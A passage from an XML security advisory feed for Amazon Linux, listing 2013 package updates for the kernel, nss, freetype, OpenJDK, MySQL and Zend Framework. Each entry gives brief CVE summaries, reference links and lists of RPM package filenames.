</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-3401" title="" id="CVE-2012-3401" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-4447" title="" id="CVE-2012-4447" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-4564" title="" id="CVE-2012-4564" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-5581" title="" id="CVE-2012-5581" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2012:1590.html" title="" id="RHSA-2012:1590" type="redhat" /></references><pkglist><collection short="amazon-linux"><name>Amazon Linux</name><package name="libtiff-static" version="3.9.4" release="9.11.amzn1" epoch="0" arch="i686"><filename>Packages/libtiff-static-3.9.4-9.11.amzn1.i686.rpm</filename></package><package name="libtiff-debuginfo" version="3.9.4" release="9.11.amzn1" epoch="0" arch="i686"><filename>Packages/libtiff-debuginfo-3.9.4-9.11.amzn1.i686.rpm</filename></package><package name="libtiff" version="3.9.4" release="9.11.amzn1" epoch="0" arch="i686"><filename>Packages/libtiff-3.9.4-9.11.amzn1.i686.rpm</filename></package><package name="libtiff-devel" version="3.9.4" release="9.11.amzn1" epoch="0" arch="i686"><filename>Packages/libtiff-devel-3.9.4-9.11.amzn1.i686.rpm</filename></package><package name="libtiff-debuginfo" version="3.9.4" release="9.11.amzn1" epoch="0" arch="x86_64"><filename>Packages/libtiff-debuginfo-3.9.4-9.11.amzn1.x86_64.rpm</filename></package><package name="libtiff" version="3.9.4" release="9.11.amzn1" epoch="0" arch="x86_64"><filename>Packages/libtiff-3.9.4-9.11.amzn1.x86_64.rpm</filename></package><package name="libtiff-static" version="3.9.4" release="9.11.amzn1" epoch="0" arch="x86_64"><filename>Packages/libtiff-static-3.9.4-9.11.amzn1.x86_64.rpm</filename></package><package name="libtiff-devel" version="3.9.4" release="9.11.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/libtiff-devel-3.9.4-9.11.amzn1.x86_64.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2013-148</id><title>Amazon Linux - ALAS-2013-148: medium priority package update for kernel nvidia</title><issued date="2013-01-14 01:14:00" /><updated date="2014-09-14 17:22:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux that fix the following vulnerabilities:
CVE-2012-5517:
The online_pages function in mm/memory_hotplug.c in the Linux kernel before 3.6 allows local users to cause a denial of service (NULL pointer dereference and system crash) or possibly have unspecified other impact in opportunistic circumstances by using memory that was hot-added by an administrator.
875374:
CVE-2012-5517 kernel: mm/hotplug: failure in propagating hot-added memory to other nodes
* A NULL pointer dereference flaw was found in the way a new node's hot added memory was propagated to other nodes' zonelists. By utilizing this newly added memory from one of the remaining nodes, a local, unprivileged user could use this flaw to cause a denial of service.
CVE-2012-4565:
871848:
CVE-2012-4565 kernel: net: divide by zero in tcp algorithm illinois
* A divide-by-zero flaw was found in the TCP Illinois congestion control algorithm implementation in the Linux kernel. If the TCP Illinois congestion control algorithm were in use (the sysctl net.ipv4.tcp_congestion_control variable set to "illinois"), a local, unprivileged user could trigger this flaw and cause a denial of service.
CVE-2012-4444:
The ip6_frag_queue function in net/ipv6/reassembly.c in the Linux kernel before 2.6.36 allows remote attackers to bypass intended network restrictions via overlapping IPv6 fragments.
874835:
CVE-2012-4444 kernel: net: acceptation of overlapping ipv6 fragments
* A flaw was found in the way the Linux kernel's IPv6 implementation handled overlapping, fragmented IPv6 packets. A remote attacker could potentially use this flaw to bypass protection mechanisms (such as a firewall or intrusion detection system (IDS)) when sending network packets to a target system.
CVE-2012-2375:
The __nfs4_get_acl_uncached function in fs/nfs/nfs4proc.c in the NFSv4 implementation in the Linux kernel before 3.3.2 uses an incorrect length variable during a copy operation, which allows remote NFS servers to cause a denial of service (OOPS) by sending an excessive number of bitmap words in an FATTR4_ACL reply. NOTE: this vulnerability exists because of an incomplete fix for CVE-2011-4131.
822869:
CVE-2012-2375 kernel: incomplete fix for CVE-2011-4131
* It was found that the RHSA-2012:0862 update did not correctly fix the CVE-2011-4131 issue. A malicious Network File System version 4 (NFSv4) server could return a crafted reply to a GETACL request, causing a denial of service on the client.
CVE-2012-2100:
The ext4_fill_flex_info function in fs/ext4/super.c in the Linux kernel before 3.2.2, on the x86 platform and unspecified other platforms, allows user-assisted remote attackers to trigger inconsistent filesystem-groups data and possibly cause a denial of service via a malformed ext4 filesystem containing a super block with a large FLEX_BG group size (aka s_log_groups_per_flex value). NOTE: this vulnerability exists because of an incomplete fix for CVE-2009-4307.
809687:
CVE-2012-2100 kernel: ext4: fix inconsistency in ext4_fill_flex_info()
* It was found that the initial release of Red Hat Enterprise Linux 6 did not correctly fix the CVE-2009-4307 issue, a divide-by-zero flaw in the ext4 file system code. A local, unprivileged user with the ability to mount an ext4 file system could use this flaw to cause a denial of service.
* It was found that the RHSA-2010:0178 update did not correctly fix the CVE-2009-4307 issue, a divide-by-zero flaw in the ext4 file system code. A local, unprivileged user with the ability to mount an ext4 file system could use this flaw to cause a denial of service.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-2100" title="" id="CVE-2012-2100" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-2375" title="" id="CVE-2012-2375" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-4444" title="" id="CVE-2012-4444" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-4565" title="" id="CVE-2012-4565" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-5517" title="" id="CVE-2012-5517" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2012:1580.html" title="" id="RHSA-2012:1580" type="redhat" /></references><pkglist><collection short="amazon-linux"><name>Amazon Linux</name><package name="kernel-devel" version="3.2.36" release="1.46.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-devel-3.2.36-1.46.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo-common-x86_64" version="3.2.36" release="1.46.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-common-x86_64-3.2.36-1.46.amzn1.x86_64.rpm</filename></package><package name="kernel-tools" version="3.2.36" release="1.46.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-3.2.36-1.46.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo" version="3.2.36" release="1.46.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-3.2.36-1.46.amzn1.x86_64.rpm</filename></package><package name="kernel" version="3.2.36" release="1.46.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-3.2.36-1.46.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-debuginfo" version="3.2.36" release="1.46.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-debuginfo-3.2.36-1.46.amzn1.x86_64.rpm</filename></package><package name="kernel-headers" version="3.2.36" release="1.46.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/kernel-headers-3.2.36-1.46.amzn1.x86_64.rpm</filename></package><package name="kernel-devel" version="3.2.36" release="1.46.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-devel-3.2.36-1.46.amzn1.i686.rpm</filename></package><package name="kernel-headers" version="3.2.36" release="1.46.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-headers-3.2.36-1.46.amzn1.i686.rpm</filename></package><package name="kernel-tools-debuginfo" version="3.2.36" release="1.46.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-debuginfo-3.2.36-1.46.amzn1.i686.rpm</filename></package><package name="kernel-tools" version="3.2.36" release="1.46.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-3.2.36-1.46.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo" version="3.2.36" release="1.46.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-3.2.36-1.46.amzn1.i686.rpm</filename></package><package name="kernel" version="3.2.36" release="1.46.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-3.2.36-1.46.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo-common-i686" version="3.2.36" release="1.46.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-common-i686-3.2.36-1.46.amzn1.i686.rpm</filename></package><package name="kernel-doc" version="3.2.36" release="1.46.amzn1" epoch="0" arch="noarch"><filename>Packages/kernel-doc-3.2.36-1.46.amzn1.noarch.rpm</filename></package><package name="nvidia" version="310.19" release="2012.09.10.amzn1" epoch="1" arch="x86_64"><filename>Packages/nvidia-310.19-2012.09.10.amzn1.x86_64.rpm</filename></package><package name="nvidia-kmod-3.2.36-1.46.amzn1" version="310.19" release="2012.09.10.amzn1" epoch="1" arch="x86_64"><filename>Packages/nvidia-kmod-3.2.36-1.46.amzn1-310.19-2012.09.10.amzn1.x86_64.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" 
type="security" from="linux-security@amazon.com"><id>ALAS-2013-149</id><title>Amazon Linux AMI 2012.09 - ALAS-2013-149: important priority package update for nss</title><issued date="2013-02-03 12:33:00" /><updated date="2014-09-14 17:22:00" /><severity>important</severity><description /><references><reference href="https://rhn.redhat.com/errata/RHSA-2013:0213.html" title="" id="RHSA-2013:0213" type="redhat" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="nss-devel" version="3.13.6" release="2.27.amzn1" epoch="0" arch="i686"><filename>Packages/nss-devel-3.13.6-2.27.amzn1.i686.rpm</filename></package><package name="nss-debuginfo" version="3.13.6" release="2.27.amzn1" epoch="0" arch="i686"><filename>Packages/nss-debuginfo-3.13.6-2.27.amzn1.i686.rpm</filename></package><package name="nss-tools" version="3.13.6" release="2.27.amzn1" epoch="0" arch="i686"><filename>Packages/nss-tools-3.13.6-2.27.amzn1.i686.rpm</filename></package><package name="nss-pkcs11-devel" version="3.13.6" release="2.27.amzn1" epoch="0" arch="i686"><filename>Packages/nss-pkcs11-devel-3.13.6-2.27.amzn1.i686.rpm</filename></package><package name="nss-sysinit" version="3.13.6" release="2.27.amzn1" epoch="0" arch="i686"><filename>Packages/nss-sysinit-3.13.6-2.27.amzn1.i686.rpm</filename></package><package name="nss" version="3.13.6" release="2.27.amzn1" epoch="0" arch="i686"><filename>Packages/nss-3.13.6-2.27.amzn1.i686.rpm</filename></package><package name="nss" version="3.13.6" release="2.27.amzn1" epoch="0" arch="x86_64"><filename>Packages/nss-3.13.6-2.27.amzn1.x86_64.rpm</filename></package><package name="nss-devel" version="3.13.6" release="2.27.amzn1" epoch="0" arch="x86_64"><filename>Packages/nss-devel-3.13.6-2.27.amzn1.x86_64.rpm</filename></package><package name="nss-pkcs11-devel" version="3.13.6" release="2.27.amzn1" epoch="0" arch="x86_64"><filename>Packages/nss-pkcs11-devel-3.13.6-2.27.amzn1.x86_64.rpm</filename></package><package 
name="nss-tools" version="3.13.6" release="2.27.amzn1" epoch="0" arch="x86_64"><filename>Packages/nss-tools-3.13.6-2.27.amzn1.x86_64.rpm</filename></package><package name="nss-debuginfo" version="3.13.6" release="2.27.amzn1" epoch="0" arch="x86_64"><filename>Packages/nss-debuginfo-3.13.6-2.27.amzn1.x86_64.rpm</filename></package><package name="nss-sysinit" version="3.13.6" release="2.27.amzn1" epoch="0" arch="x86_64"><filename>Packages/nss-sysinit-3.13.6-2.27.amzn1.x86_64.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2013-150</id><title>Amazon Linux AMI 2012.09 - ALAS-2013-150: important priority package update for freetype</title><issued date="2013-02-03 12:34:00" /><updated date="2014-09-14 17:22:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2012-5669:
The _bdf_parse_glyphs function in FreeType before 2.4.11 allows context-dependent attackers to cause a denial of service (crash) via vectors related to BDF fonts and an incorrect calculation that triggers an out-of-bounds read.
A flaw was found in the way the FreeType font rendering engine processed certain Glyph Bitmap Distribution Format (BDF) fonts. If a user loaded a specially-crafted font file with an application linked against FreeType, it could cause the application to crash or, possibly, execute arbitrary code with the privileges of the user running the application.
890088:
CVE-2012-5669 freetype: heap buffer over-read in BDF parsing _bdf_parse_glyphs() (#37906)
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-5669" title="" id="CVE-2012-5669" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2013:0216.html" title="" id="RHSA-2013:0216" type="redhat" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="freetype-devel" version="2.3.11" release="14.13.amzn1" epoch="0" arch="i686"><filename>Packages/freetype-devel-2.3.11-14.13.amzn1.i686.rpm</filename></package><package name="freetype-debuginfo" version="2.3.11" release="14.13.amzn1" epoch="0" arch="i686"><filename>Packages/freetype-debuginfo-2.3.11-14.13.amzn1.i686.rpm</filename></package><package name="freetype" version="2.3.11" release="14.13.amzn1" epoch="0" arch="i686"><filename>Packages/freetype-2.3.11-14.13.amzn1.i686.rpm</filename></package><package name="freetype-demos" version="2.3.11" release="14.13.amzn1" epoch="0" arch="i686"><filename>Packages/freetype-demos-2.3.11-14.13.amzn1.i686.rpm</filename></package><package name="freetype-devel" version="2.3.11" release="14.13.amzn1" epoch="0" arch="x86_64"><filename>Packages/freetype-devel-2.3.11-14.13.amzn1.x86_64.rpm</filename></package><package name="freetype" version="2.3.11" release="14.13.amzn1" epoch="0" arch="x86_64"><filename>Packages/freetype-2.3.11-14.13.amzn1.x86_64.rpm</filename></package><package name="freetype-demos" version="2.3.11" release="14.13.amzn1" epoch="0" arch="x86_64"><filename>Packages/freetype-demos-2.3.11-14.13.amzn1.x86_64.rpm</filename></package><package name="freetype-debuginfo" version="2.3.11" release="14.13.amzn1" epoch="0" arch="x86_64"><filename>Packages/freetype-debuginfo-2.3.11-14.13.amzn1.x86_64.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2013-151</id><title>Amazon Linux AMI 2012.09 - ALAS-2013-151: important priority package 
update for java-1.7.0-openjdk</title><issued date="2013-02-03 12:35:00" /><updated date="2014-09-15 22:21:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2012-3174:
Unspecified vulnerability in Oracle Java 7 before Update 11 allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors, a different vulnerability than CVE-2013-0422. NOTE: some parties have mapped CVE-2012-3174 to an issue involving recursive use of the Reflection API, but that issue is already covered as part of CVE-2013-0422. This identifier is for a different vulnerability whose details are not public as of 20130114.
Two improper permission check issues were discovered in the reflection API in OpenJDK. An untrusted Java application or applet could use these flaws to bypass Java sandbox restrictions.
This update fixes two vulnerabilities in the Oracle Java Runtime Environment and the Oracle Java Software Development Kit. Further information about these flaws can be found on the Oracle Security Alert page, listed in the References section.
894934:
CVE-2012-3174 OpenJDK: MethodHandles incorrect permission checks (Libraries, 8004933)
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-3174" title="" id="CVE-2012-3174" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2013:0165.html" title="" id="RHSA-2013:0165" type="redhat" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="java-1.7.0-openjdk-src" version="1.7.0.9" release="2.3.4.1.15.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.7.0-openjdk-src-1.7.0.9-2.3.4.1.15.amzn1.i686.rpm</filename></package><package name="java-1.7.0-openjdk" version="1.7.0.9" release="2.3.4.1.15.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.7.0-openjdk-1.7.0.9-2.3.4.1.15.amzn1.i686.rpm</filename></package><package name="java-1.7.0-openjdk-demo" version="1.7.0.9" release="2.3.4.1.15.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.7.0-openjdk-demo-1.7.0.9-2.3.4.1.15.amzn1.i686.rpm</filename></package><package name="java-1.7.0-openjdk-debuginfo" version="1.7.0.9" release="2.3.4.1.15.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.7.0-openjdk-debuginfo-1.7.0.9-2.3.4.1.15.amzn1.i686.rpm</filename></package><package name="java-1.7.0-openjdk-devel" version="1.7.0.9" release="2.3.4.1.15.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.7.0-openjdk-devel-1.7.0.9-2.3.4.1.15.amzn1.i686.rpm</filename></package><package name="java-1.7.0-openjdk-src" version="1.7.0.9" release="2.3.4.1.15.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.7.0-openjdk-src-1.7.0.9-2.3.4.1.15.amzn1.x86_64.rpm</filename></package><package name="java-1.7.0-openjdk" version="1.7.0.9" release="2.3.4.1.15.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.7.0-openjdk-1.7.0.9-2.3.4.1.15.amzn1.x86_64.rpm</filename></package><package name="java-1.7.0-openjdk-javadoc" version="1.7.0.9" release="2.3.4.1.15.amzn1" epoch="1" arch="noarch"><filename>Packages/java-1.7.0-openjdk-javadoc-1.7.0.9-2.3.4.1.15.amzn1.noarch.rpm</filename></package><package 
name="java-1.7.0-openjdk-devel" version="1.7.0.9" release="2.3.4.1.15.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.7.0-openjdk-devel-1.7.0.9-2.3.4.1.15.amzn1.x86_64.rpm</filename></package><package name="java-1.7.0-openjdk-demo" version="1.7.0.9" release="2.3.4.1.15.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.7.0-openjdk-demo-1.7.0.9-2.3.4.1.15.amzn1.x86_64.rpm</filename></package><package name="java-1.7.0-openjdk-debuginfo" version="1.7.0.9" release="2.3.4.1.15.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.7.0-openjdk-debuginfo-1.7.0.9-2.3.4.1.15.amzn1.x86_64.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2013-152</id><title>Amazon Linux AMI 2012.09 - ALAS-2013-152: medium priority package update for mysql51</title><issued date="2013-02-03 12:41:00" /><updated date="2014-09-15 22:23:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2012-0572:
This update fixes several vulnerabilities in the MySQL database server. Information about these flaws can be found on the Oracle Critical Patch Update Advisory page, listed in the References section.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0572" title="" id="CVE-2012-0572" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2013:0219.html" title="" id="RHSA-2013:0219" type="redhat" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="mysql51" version="5.1.67" release="1.60.amzn1" epoch="0" arch="i686"><filename>Packages/mysql51-5.1.67-1.60.amzn1.i686.rpm</filename></package><package name="mysql51-libs" version="5.1.67" release="1.60.amzn1" epoch="0" arch="i686"><filename>Packages/mysql51-libs-5.1.67-1.60.amzn1.i686.rpm</filename></package><package name="mysql51-devel" version="5.1.67" release="1.60.amzn1" epoch="0" arch="i686"><filename>Packages/mysql51-devel-5.1.67-1.60.amzn1.i686.rpm</filename></package><package name="mysql51-embedded-devel" version="5.1.67" release="1.60.amzn1" epoch="0" arch="i686"><filename>Packages/mysql51-embedded-devel-5.1.67-1.60.amzn1.i686.rpm</filename></package><package name="mysql51-embedded" version="5.1.67" release="1.60.amzn1" epoch="0" arch="i686"><filename>Packages/mysql51-embedded-5.1.67-1.60.amzn1.i686.rpm</filename></package><package name="mysql51-common" version="5.1.67" release="1.60.amzn1" epoch="0" arch="i686"><filename>Packages/mysql51-common-5.1.67-1.60.amzn1.i686.rpm</filename></package><package name="mysql51-bench" version="5.1.67" release="1.60.amzn1" epoch="0" arch="i686"><filename>Packages/mysql51-bench-5.1.67-1.60.amzn1.i686.rpm</filename></package><package name="mysql51-test" version="5.1.67" release="1.60.amzn1" epoch="0" arch="i686"><filename>Packages/mysql51-test-5.1.67-1.60.amzn1.i686.rpm</filename></package><package name="mysql51-server" version="5.1.67" release="1.60.amzn1" epoch="0" arch="i686"><filename>Packages/mysql51-server-5.1.67-1.60.amzn1.i686.rpm</filename></package><package name="mysql51-debuginfo" version="5.1.67" release="1.60.amzn1" epoch="0" 
arch="i686"><filename>Packages/mysql51-debuginfo-5.1.67-1.60.amzn1.i686.rpm</filename></package><package name="mysql51-embedded-devel" version="5.1.67" release="1.60.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql51-embedded-devel-5.1.67-1.60.amzn1.x86_64.rpm</filename></package><package name="mysql51-common" version="5.1.67" release="1.60.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql51-common-5.1.67-1.60.amzn1.x86_64.rpm</filename></package><package name="mysql51-embedded" version="5.1.67" release="1.60.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql51-embedded-5.1.67-1.60.amzn1.x86_64.rpm</filename></package><package name="mysql51-test" version="5.1.67" release="1.60.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql51-test-5.1.67-1.60.amzn1.x86_64.rpm</filename></package><package name="mysql51-libs" version="5.1.67" release="1.60.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql51-libs-5.1.67-1.60.amzn1.x86_64.rpm</filename></package><package name="mysql51-bench" version="5.1.67" release="1.60.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql51-bench-5.1.67-1.60.amzn1.x86_64.rpm</filename></package><package name="mysql51-server" version="5.1.67" release="1.60.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql51-server-5.1.67-1.60.amzn1.x86_64.rpm</filename></package><package name="mysql51-debuginfo" version="5.1.67" release="1.60.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql51-debuginfo-5.1.67-1.60.amzn1.x86_64.rpm</filename></package><package name="mysql51" version="5.1.67" release="1.60.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql51-5.1.67-1.60.amzn1.x86_64.rpm</filename></package><package name="mysql51-devel" version="5.1.67" release="1.60.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql51-devel-5.1.67-1.60.amzn1.x86_64.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" 
from="linux-security@amazon.com"><id>ALAS-2013-153</id><title>Amazon Linux AMI 2012.09 - ALAS-2013-153: medium priority package update for php-ZendFramework</title><issued date="2013-02-04 15:19:00" /><updated date="2014-09-15 22:24:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2012-5657:
889037:
CVE-2012-5657 php-ZendFramework: information disclosure flaw due to error when processing XML data
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-5657" title="" id="CVE-2012-5657" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="php-ZendFramework-Serializer-Adapter-Igbinary" version="1.12.1" release="1.6.amzn1" epoch="0" arch="noarch"><filename>Packages/php-ZendFramework-Serializer-Adapter-Igbinary-1.12.1-1.6.amzn1.noarch.rpm</filename></package><package name="php-ZendFramework-Db-Adapter-Pdo-Mysql" version="1.12.1" release="1.6.amzn1" epoch="0" arch="noarch"><filename>Packages/php-ZendFramework-Db-Adapter-Pdo-Mysql-1.12.1-1.6.amzn1.noarch.rpm</filename></package><package name="php-ZendFramework-demos" version="1.12.1" release="1.6.amzn1" epoch="0" arch="noarch"><filename>Packages/php-ZendFramework-demos-1.12.1-1.6.amzn1.noarch.rpm</filename></package><package name="php-ZendFramework-Cache-Backend-Memcached" version="1.12.1" release="1.6.amzn1" epoch="0" arch="noarch"><filename>Packages/php-ZendFramework-Cache-Backend-Memcached-1.12.1-1.6.amzn1.noarch.rpm</filename></package><package name="php-ZendFramework-Search-Lucene" version="1.12.1" release="1.6.amzn1" epoch="0" arch="noarch"><filename>Packages/php-ZendFramework-Search-Lucene-1.12.1-1.6.amzn1.noarch.rpm</filename></package><package name="php-ZendFramework-Pdf" version="1.12.1" release="1.6.amzn1" epoch="0" arch="noarch"><filename>Packages/php-ZendFramework-Pdf-1.12.1-1.6.amzn1.noarch.rpm</filename></package><package name="php-ZendFramework-Captcha" version="1.12.1" release="1.6.amzn1" epoch="0" arch="noarch"><filename>Packages/php-ZendFramework-Captcha-1.12.1-1.6.amzn1.noarch.rpm</filename></package><package name="php-ZendFramework-Services" version="1.12.1" release="1.6.amzn1" epoch="0" arch="noarch"><filename>Packages/php-ZendFramework-Services-1.12.1-1.6.amzn1.noarch.rpm</filename></package><package name="php-ZendFramework-Ldap" version="1.12.1" release="1.6.amzn1" epoch="0" 
arch="noarch"><filename>Packages/php-ZendFramework-Ldap-1.12.1-1.6.amzn1.noarch.rpm</filename></package><package name="php-ZendFramework-Cache-Backend-Apc" version="1.12.1" release="1.6.amzn1" epoch="0" arch="noarch"><filename>Packages/php-ZendFramework-Cache-Backend-Apc-1.12.1-1.6.amzn1.noarch.rpm</filename></package><package name="php-ZendFramework-Auth-Adapter-Ldap" version="1.12.1" release="1.6.amzn1" epoch="0" arch="noarch"><filename>Packages/php-ZendFramework-Auth-Adapter-Ldap-1.12.1-1.6.amzn1.noarch.rpm</filename></package><package name="php-ZendFramework-extras" version="1.12.1" release="1.6.amzn1" epoch="0" arch="noarch"><filename>Packages/php-ZendFramework-extras-1.12.1-1.6.amzn1.noarch.rpm</filename></package><package name="php-ZendFramework-Feed" version="1.12.1" release="1.6.amzn1" epoch="0" arch="noarch"><filename>Packages/php-ZendFramework-Feed-1.12.1-1.6.amzn1.noarch.rpm</filename></package><package name="php-ZendFramework-Db-Adapter-Pdo-Pgsql" version="1.12.1" release="1.6.amzn1" epoch="0" arch="noarch"><filename>Packages/php-ZendFramework-Db-Adapter-Pdo-Pgsql-1.12.1-1.6.amzn1.noarch.rpm</filename></package><package name="php-ZendFramework-Soap" version="1.12.1" release="1.6.amzn1" epoch="0" arch="noarch"><filename>Packages/php-ZendFramework-Soap-1.12.1-1.6.amzn1.noarch.rpm</filename></package><package name="php-ZendFramework-full" version="1.12.1" release="1.6.amzn1" epoch="0" arch="noarch"><filename>Packages/php-ZendFramework-full-1.12.1-1.6.amzn1.noarch.rpm</filename></package><package name="php-ZendFramework-Dojo" version="1.12.1" release="1.6.amzn1" epoch="0" arch="noarch"><filename>Packages/php-ZendFramework-Dojo-1.12.1-1.6.amzn1.noarch.rpm</filename></package><package name="php-ZendFramework-Db-Adapter-Mysqli" version="1.12.1" release="1.6.amzn1" epoch="0" arch="noarch"><filename>Packages/php-ZendFramework-Db-Adapter-Mysqli-1.12.1-1.6.amzn1.noarch.rpm</filename></package><package name="php-ZendFramework-Cache-Backend-Libmemcached" 
version="1.12.1" release="1.6.amzn1" epoch="0" arch="noarch"><filename>Packages/php-ZendFramework-Cache-Backend-Libmemcached-1.12.1-1.6.amzn1.noarch.rpm</filename></package><package name="php-ZendFramework" version="1.12.1" release="1.6.amzn1" epoch="0" arch="noarch"><filename>Packages/php-ZendFramework-1.12.1-1.6.amzn1.noarch.rpm</filename></package><package name="php-ZendFramework-Db-Adapter-Pdo-Mssql" version="1.12.1" release="1.6.amzn1" epoch="0" arch="noarch"><filename>Packages/php-ZendFramework-Db-Adapter-Pdo-Mssql-1.12.1-1.6.amzn1.noarch.rpm</filename></package><package name="php-ZendFramework-Db-Adapter-Pdo" version="1.12.1" release="1.6.amzn1" epoch="0" arch="noarch"><filename>Packages/php-ZendFramework-Db-Adapter-Pdo-1.12.1-1.6.amzn1.noarch.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2013-154</id><title>Amazon Linux AMI 2012.09 - ALAS-2013-154: medium priority package update for kernel nvidia</title><issued date="2013-02-04 15:45:00" /><updated date="2014-09-15 22:27:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2013-0190:
896038:
CVE-2013-0190 kernel: stack corruption in xen_failsafe_callback()
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-0190" title="" id="CVE-2013-0190" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="kernel-debuginfo-common-x86_64" version="3.2.37" release="2.47.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-common-x86_64-3.2.37-2.47.amzn1.x86_64.rpm</filename></package><package name="kernel-devel" version="3.2.37" release="2.47.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-devel-3.2.37-2.47.amzn1.x86_64.rpm</filename></package><package name="kernel" version="3.2.37" release="2.47.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-3.2.37-2.47.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo" version="3.2.37" release="2.47.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-3.2.37-2.47.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-debuginfo" version="3.2.37" release="2.47.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-debuginfo-3.2.37-2.47.amzn1.x86_64.rpm</filename></package><package name="kernel-headers" version="3.2.37" release="2.47.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-headers-3.2.37-2.47.amzn1.x86_64.rpm</filename></package><package name="kernel-tools" version="3.2.37" release="2.47.amzn1" epoch="0" 